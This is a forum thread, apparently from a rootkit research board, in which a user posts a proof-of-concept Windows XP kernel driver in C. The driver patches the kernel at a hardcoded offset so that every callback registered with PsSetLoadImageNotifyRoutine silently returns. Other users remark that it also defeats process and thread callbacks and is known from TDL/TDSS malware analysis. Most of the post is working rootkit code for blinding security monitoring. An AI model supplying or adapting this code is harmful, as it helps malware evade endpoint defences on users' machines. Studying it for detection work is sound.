[R00tKit]

hi
this is POC that disable any callback registered with PsSetLoadImageNotifyRoutine( this method also work for other callbacks )
may be this idea is old , i dont know ( this is only for education purpose )

Code: Select all

void callback (
    IN PUNICODE_STRING  FullImageName,
    IN HANDLE  ProcessId, // where image is mapped
    IN PIMAGE_INFO  ImageInfo
    )
	
{
	char* f;
	void * pvReturn ;
	void ** puEBP = NULL;
	__asm { mov puEBP, ebp };
	pvReturn = puEBP[1]; // this is the caller of my function
	f=((char*)pvReturn)-0x36;	//xp
	// __asm
	 // {
	 // call DisableReadonly
	 // mov byte ptr [f],0xc2
	 // mov byte ptr [f+1],0x0c
	 // mov byte ptr[f+2],0x00
	 // call EnableReadonly
	 // }
	 
    DisableReadonly();
     *f=0xc2;
     *(f+1)=0x0c;
     *(f+2)=0x00;
    EnableReadonly();
	
	DbgPrint("kernel  patched %x ,%x \r\n",f,pvReturn);
}

tested in XP sp3 ( offset is hardcode ,it can be portable with simple disassembler )

with simple modification we can get list of registered callback

use:

Code: Select all

NTSTATUS 
	DriverEntry
	(
		IN		PDRIVER_OBJECT		DriverObject, 
		IN		PUNICODE_STRING		RegistryPath
	)
{
	DriverObject->DriverUnload	= DriverUnload;
	DbgPrint( "Hello World\n" );
	PsSetLoadImageNotifyRoutine(callback);
	return STATUS_SUCCESS;
}

thanks BlZbB for help

[Brock]

Not new, at least to me

[lorddoskias]

I haven't looked at what exactly is at this offset but is there any chance that it basically tinkers with nt!PspCreateProcessNotifyRoutineCount ?

[Vrtule]

I have not seen this technique before (as I have not seen many other techniques). But I have known about this possibility for a long time. Personally, I prefer pattern matching algorithms not dependent on my stack.

[prometheus]

I havemalready documented this technique in http://blog.zemana.com/2012/01/tdl-tdss ... izlik.html nearly a month ago. You can use it to disable Process and thread callbacks also.